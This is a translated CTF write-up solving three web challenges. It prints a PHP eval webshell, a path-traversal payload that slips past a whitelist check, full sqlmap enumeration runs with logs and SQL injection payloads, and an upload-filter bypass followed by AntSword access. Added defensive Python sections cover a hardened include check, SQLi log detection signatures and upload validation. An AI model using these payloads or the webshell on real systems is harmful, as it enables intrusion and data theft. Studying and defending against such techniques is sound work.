Web Security Weekly Notes (5): Write-ups
Preface
All three problems come from the WEB advanced area (高手进阶区) of 攻防世界 (Attack & Defense World).
1. Background knowledge
① Statement that prints the PHP configuration information:
<?php phpinfo();?>
② PHP one-line webshell (一句话木马):
<?php @eval($_POST[a]); ?>
③ sqlmap commands:
Inject into a given parameter of a POST request:
sqlmap -u http://111.200.241.244:58877 --data "search=df"
List the databases:
sqlmap -u http://111.200.241.244:58877/ --data "search=df" -dbs
List all tables in a given database:
sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news --tables
List all columns of a given table in a given database:
sqlmap -u http://111.200.241.244:58877 --data "search=df" -D news -T secret_table --columns
Dump every entry of a given column of a given table in a given database:
sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news -T secret_table -C "fl4g" --dump
④ MySQL database structure:
Database ~ website ~ database user
    Table name
        Column name
            Data

2. Solving the problems
1. warmup
Problem description:
Source: HCTF 2018

Approach:
The usual first step: open the page source.
A suspicious <!--source.php--> comment shows up, so build a payload to view it.
That reveals the PHP source and a suspicious hint.php; build a payload to view that as well.
From the hint on that page, guess that ffffllllaaaagggg is the flag file name.
Next, audit the code.
<?php
    highlight_file(__FILE__);
    class emmm // define a class emmm.
    {
        public static function checkFile(&$page) // define the checkFile function.
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; // the whitelist.
            if (! isset($page) || !is_string($page)) { // isset() checks the variable is set; is_string() checks it is a string.
                echo "you can't see it";
                return false;
            }
            if (in_array($page, $whitelist)) { // first check: is the incoming value in the whitelist $whitelist?
                return true;
            }
            $_page = mb_substr( // first '?' truncation (if $page contains a '?', keep only the part before it).
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) { // second check against the whitelist $whitelist.
                return true;
            }
            $_page = urldecode($page); // URL-decode $page.
            $_page = mb_substr( // second '?' truncation.
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) { // third check against the whitelist $whitelist.
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    if (! empty($_REQUEST['file']) // the file parameter must not be empty.
        && is_string($_REQUEST['file']) // the value must be a string.
        && emmm::checkFile($_REQUEST['file']) // pass the value to checkFile in the emmm class.
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
?>
So checkFile performs 3 whitelist checks, 2 '?' truncations and 1 URL decode in total.
The idea behind the payload: when file enters checkFile it first goes through the first whitelist check and one '?' truncation, after which the value is hint.php; that passes the next whitelist check and returns true. The path therefore has to step back up four directory levels, so that once the condition holds the include runs and yields the flag.
So construct the new payload:
http://111.200.241.244:50880/index.php?file=hint.php?../../../../../ffffllllaaaagggg

The final flag is flag{25e7bce6005c4e0c983fb97297ac6e5a}.
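The audit above comes down to one defect: every whitelist check runs on a rewritten copy of the value (truncated at '?', URL-decoded), while include receives the original string. As an added example that is not part of the original write-up, the Python below ports the checkFile logic line for line so the mismatch can be tested offline against the payload shown above, and puts a hardened variant next to it that only ever includes a canonical whitelist entry. Modelling include as a function that returns the path PHP would be asked to open is this example's own assumption.

```python
"""Added example (not from the original write-up): the warmup checkFile logic ported
to Python, next to a hardened variant. Ported line for line from the PHP source above;
'include' is modelled as a function returning the path PHP would be asked to open,
which is this example's modelling assumption.
"""
from urllib.parse import unquote_plus  # PHP urldecode() also turns '+' into a space

WHITELIST = {"source": "source.php", "hint": "hint.php"}
# The payload from the write-up, used here as the test input.
PAGE_PAYLOAD = "hint.php?../../../../../ffffllllaaaagggg"


def _before_question_mark(s: str) -> str:
    # mb_substr($s, 0, mb_strpos($s . '?', '?')): everything before the first '?'
    return s.split("?", 1)[0]


def check_file(page) -> bool:
    """Port of emmm::checkFile: 3 whitelist checks, 2 '?' truncations, 1 URL decode."""
    if not isinstance(page, str):                              # !isset() || !is_string()
        return False
    if page in WHITELIST.values():                             # check 1: the raw value
        return True
    if _before_question_mark(page) in WHITELIST.values():      # check 2: after '?' truncation
        return True
    decoded = unquote_plus(page)                               # urldecode()
    if _before_question_mark(decoded) in WHITELIST.values():   # check 3: decode, then truncate
        return True
    return False


def include_path_original(page):
    """What the original code does: the check runs on a rewritten copy, but include
    receives the RAW request value, so the two can name different files."""
    return page if check_file(page) else None


def include_path_hardened(page):
    """Hardened variant: accept a whitelist key ('hint') or the exact file name
    ('hint.php') and include only the canonical whitelist entry, so the string
    that was checked is the string that is used. No truncation, no decoding."""
    if not isinstance(page, str):
        return None
    if page in WHITELIST:
        return WHITELIST[page]
    if page in WHITELIST.values():
        return page
    return None


if __name__ == "__main__":
    for candidate in (PAGE_PAYLOAD, "hint.php%3F../x", "hint", "../../etc/passwd"):
        print(f"{candidate!r:45} check={check_file(candidate)!s:5} "
              f"original={include_path_original(candidate)!r} "
              f"hardened={include_path_hardened(candidate)!r}")
```

Running it shows the page's payload passing check_file (the second check sees only hint.php) while include_path_original hands the full string to include; the hardened variant returns None for it and hint.php for the two legitimate spellings. The general lesson for review is that a validator must return the value to be used, not a boolean about a transformed copy of it.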
2. NewsCenter
Problem description:
Source: XCTF 4th-QCTF-2018

Approach:
There is only one input box, so try SQL injection: 1' union select 1,2,3#.
Positions 2 and 3 turn out to be injectable, so switch to sqlmap for the rest.
First run sqlmap -u http://111.200.241.244:58877 --data "search=df" to find the injection point.
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877 --data "search=df"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:05:59 /2022-04-25/
[17:05:59] [INFO] testing connection to the target URL
[17:05:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:05:59] [INFO] testing if the target URL content is stable
[17:06:00] [INFO] target URL content is stable
[17:06:00] [INFO] testing if POST parameter 'search' is dynamic
[17:06:00] [WARNING] POST parameter 'search' does not appear to be dynamic
[17:06:00] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[17:06:00] [INFO] testing for SQL injection on POST parameter 'search'
[17:06:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:00] [WARNING] reflective value(s) found and filtering out
[17:06:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:06:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:06:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:06:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:06:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:06:02] [INFO] testing 'Generic inline queries'
[17:06:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:06:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:06:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:06:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:06:13] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:06:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:06:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:06:26] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:06:26] [INFO] target URL appears to have 3 columns in query
[17:06:27] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:06:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:06:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[17:06:33] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:06:33 /2022-04-25/
Then run sqlmap -u http://111.200.241.244:58877/ --data "search=df" -dbs to list the databases.
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877/ --data "search=df" -dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:14:02 /2022-04-25/
[17:14:02] [INFO] resuming back-end DBMS 'mysql'
[17:14:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:14:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:14:03] [INFO] fetching database names
[17:14:03] [WARNING] reflective value(s) found and filtering out
available databases [2]:
[*] information_schema
[*] news
[17:14:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:14:03] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:14:03 /2022-04-25/
Next run sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news --tables to list the tables in the news database.
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877/ --data "search=df" -D news --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:16:48 /2022-04-25/
[17:16:48] [INFO] resuming back-end DBMS 'mysql'
[17:16:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:16:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:16:48] [INFO] fetching tables for database: 'news'
[17:16:48] [WARNING] reflective value(s) found and filtering out
Database: news
[2 tables]
+--------------+
| news         |
| secret_table |
+--------------+
[17:16:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:16:48] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:16:48 /2022-04-25/
Then run sqlmap -u http://111.200.241.244:58877 --data "search=df" -D news -T secret_table --columns to list the columns of secret_table in the news database.
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877 --data "search=df" -D news -T secret_table --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:18:41 /2022-04-25/
[17:18:41] [INFO] resuming back-end DBMS 'mysql'
[17:18:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:18:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:18:41] [INFO] fetching columns for table 'secret_table' in database 'news'
[17:18:41] [WARNING] reflective value(s) found and filtering out
Database: news
Table: secret_table
[2 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| fl4g   | varchar(50)      |
| id     | int(10) unsigned |
+--------+------------------+
[17:18:41] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:18:41] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:18:41 /2022-04-25/
Finally run sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news -T secret_table -C "fl4g" --dump to dump the fl4g column of secret_table in the news database.
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877/ --data "search=df" -D news -T secret_table -C "fl4g" --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.3.19#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:20:26 /2022-04-25/
[17:20:27] [INFO] resuming back-end DBMS 'mysql'
[17:20:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:20:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:20:27] [INFO] fetching entries of column(s) 'fl4g' for table 'secret_table' in database 'news'
[17:20:27] [WARNING] reflective value(s) found and filtering out
Database: news
Table: secret_table
[1 entry]
+--------------------------+
| fl4g                     |
+--------------------------+
| QCTF{sq1_inJec7ion_ezzz} |
+--------------------------+
[17:20:27] [INFO] table 'news.secret_table' dumped to CSV file 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244\dump\news\secret_table.csv'
[17:20:27] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[17:20:27] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:20:27 /2022-04-25/
The flag is QCTF{sq1_inJec7ion_ezzz}.
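The sqlmap runs above leave a recognisable trail on the server side: one client sends SLEEP()-based payloads, UNION ALL SELECT NULL,... column enumeration and a sqlmap/... User-Agent, and the tool itself reports the string of HTTP 500s it caused ("500 (Internal Server Error) - 26 times"). As an added example that is not part of the original write-up, the Python script below parses a handful of access-log lines and flags exactly those patterns per client. The log lines are constructed for this example and follow a combined-log layout with the POST body appended as body="..."; that the server logs request bodies is this example's assumption, and the signature list and the 500-burst threshold are its own choices.

```python
"""Added example (not part of the original write-up): flag the server-side traces of
an automated SQL injection run like the one above from access-log lines.

Log lines are constructed. Layout assumed: combined log format with the POST body
appended as body="...", which is this example's assumption about the server config.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"(?: body="(?P<body>[^"]*)")?$'
)

# Signatures matching the payload classes sqlmap reported in the run above.
SIGNATURES = {
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "union_enum": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "error_based_extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "comment_terminator": re.compile(r"(?:--\s*-?|#)\s*$"),
}
SQLMAP_UA = re.compile(r"sqlmap", re.I)
ERROR_BURST_THRESHOLD = 5  # example's own choice: 5+ HTTP 5xx from one client

# Constructed sample: one client probing like the run above, one ordinary visitor.
LOG_LINES = [
    '203.0.113.10 - - [25/Apr/2022:17:06:00 +0800] "POST / HTTP/1.1" 200 1432 "-" '
    '"sqlmap/1.6.3.19#dev (https://sqlmap.org)" '
    'body="search=df%27+AND+%28SELECT+9308+FROM+%28SELECT%28SLEEP%285%29%29%29qSnW%29+AND+%27fMwN%27%3D%27fMwN"',
    '203.0.113.10 - - [25/Apr/2022:17:06:26 +0800] "POST / HTTP/1.1" 200 1510 "-" '
    '"sqlmap/1.6.3.19#dev (https://sqlmap.org)" '
    'body="search=df%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL--+-"',
] + [
    f'203.0.113.10 - - [25/Apr/2022:17:06:{sec:02d} +0800] "POST / HTTP/1.1" 500 0 "-" '
    f'"sqlmap/1.6.3.19#dev (https://sqlmap.org)" body="search=df%27+ORDER+BY+{n}--+-"'
    for sec, n in zip(range(5, 11), range(4, 10))
] + [
    '198.51.100.7 - - [25/Apr/2022:17:07:02 +0800] "POST / HTTP/1.1" 200 2210 "-" '
    '"Mozilla/5.0" body="search=world+cup"',
]


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = unquote_plus(entry["path"])        # decode so signatures see plain SQL
    entry["body"] = unquote_plus(entry["body"] or "")
    return entry


def classify(entry):
    """Return the set of signature names matched by one parsed entry."""
    hits = set()
    haystack = entry["path"] + " " + entry["body"]
    for name, rx in SIGNATURES.items():
        if rx.search(haystack):
            hits.add(name)
    if SQLMAP_UA.search(entry["ua"]):
        hits.add("sqlmap_user_agent")
    return hits


def analyze(lines):
    """Aggregate findings per client IP: signature counts plus a 5xx-burst flag."""
    findings = defaultdict(Counter)
    errors = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for hit in classify(entry):
            findings[entry["ip"]][hit] += 1
        if entry["status"].startswith("5"):
            errors[entry["ip"]] += 1
    for ip, count in errors.items():
        if count >= ERROR_BURST_THRESHOLD:
            findings[ip]["http_500_burst"] = count
    return {ip: dict(counts) for ip, counts in findings.items()}


if __name__ == "__main__":
    for ip, counts in analyze(LOG_LINES).items():
        print(ip, counts)
```

On the constructed input only 203.0.113.10 is reported, with one SLEEP() probe, one UNION enumeration, eight sqlmap User-Agent hits and a burst of six 500s; the ordinary visitor produces no entry. The 500 burst is the signal worth keeping even where the application has its own input filtering: the error counter in sqlmap's own summary is the same number seen from the server side.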
3. upload1
Problem description:

Approach:
First try uploading an arbitrary file. The challenge insists on an image file, which suggests a file upload vulnerability, so prepare in advance a jpg file containing the PHP statements that might trigger it: one that prints the PHP configuration and a one-line webshell.
<?php phpinfo();?><?php @eval($_POST[a]); ?>
Then upload it. It is uploaded as jpg in order to get past the filter.
But for the PHP to execute, intercept the upload request and change "111.jpg" to "111.php".
After forwarding the request, the page reports that the upload succeeded.
Next, construct the payload; the returned page shows the PHP configuration, which confirms the PHP statements were executed.
Connect with 中国蚁剑 (AntSword), configuring the URL and the password.
URL: http://111.200.241.244:51440/upload/1650899544.111.php
Password: a

Inside, there is a flag.php file.
Open it to get the flag: cyberpeace{1dc58753145929012a884577c6888f61}.
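The upload1 challenge worked because the server accepted the file name as the client sent it (after the proxy rename to 111.php) and never looked at the file contents. As an added example that is not part of the original write-up, here is the server-side validation a practitioner would want on an image upload endpoint, in Python: the extension is taken only from the basename of the client name and matched against an allowlist, the magic bytes must agree with that extension, files that carry a PHP open tag are rejected, and the stored name is generated by the server. The sample file contents are constructed; the allowlist, the size limit and the tag pattern are this example's own choices.

```python
"""Added example (not part of the original write-up): server-side validation for an
image upload endpoint. The client-supplied file name and Content-Type are untrusted;
only the basename's extension is used, and it must agree with the file's magic
bytes. The stored name is generated by the server. Sample contents are constructed.
"""
import os
import re
import secrets

# Extension allowlist with the magic bytes each must start with (example's own choice).
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # 2 MiB cap (example's own choice)
# PHP open tags. Bare '<?' is not matched because the two bytes 3C 3F can occur in
# legitimate binary image data; '<?php' and '<?=' are the tags PHP honours by default.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed sample uploads.
JPEG_OK = b"\xff\xd8\xff\xe0" + b"\x00" * 32                  # minimal JPEG-like header
JPEG_WITH_PHP = b"\xff\xd8\xff\xe0" + b"<?php phpinfo();?>"   # JPEG header with the probe from the write-up appended
PLAIN_PHP = b"<?php phpinfo();?>"                             # PHP source with no image header


def validate_upload(client_name: str, data: bytes):
    """Return (True, ext) for an acceptable image, otherwise (False, reason)."""
    if not data or len(data) > MAX_BYTES:
        return False, "size out of range"
    base = os.path.basename(client_name.replace("\\", "/"))  # drop any client-supplied path
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:  # '111.php' is refused here whatever Content-Type says
        return False, f"extension {ext!r} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    if PHP_OPEN_TAG.search(data):  # an image that carries PHP source is refused
        return False, "embedded PHP open tag"
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen name: random token plus the validated extension; the client's name is never reused."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name, data in (("111.jpg", JPEG_OK), ("111.php", JPEG_OK),
                       ("111.jpg", PLAIN_PHP), ("111.jpg", JPEG_WITH_PHP)):
        ok, info = validate_upload(name, data)
        print(f"{name:8} -> {'stored as ' + stored_name(info) if ok else 'rejected: ' + info}")
```

The tag scan is a secondary check. The control that actually removes the risk is serving the upload directory from a location where the web server never executes scripts (no PHP handler, or a separate static host), because a content filter can always be out-run by a format the filter does not understand.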
 
Summary
That covers this week's write-ups. The main points are the statements used in file upload exploitation (the PHP one-line webshell and the PHP configuration statement), the series of sqlmap commands (injecting into a given POST parameter, listing databases, listing all tables in a database, listing all columns of a table, dumping a given column of a table), PHP code auditing and SQL injection, plus the use of tools such as 中国蚁剑 (AntSword), Burp Suite and sqlmap.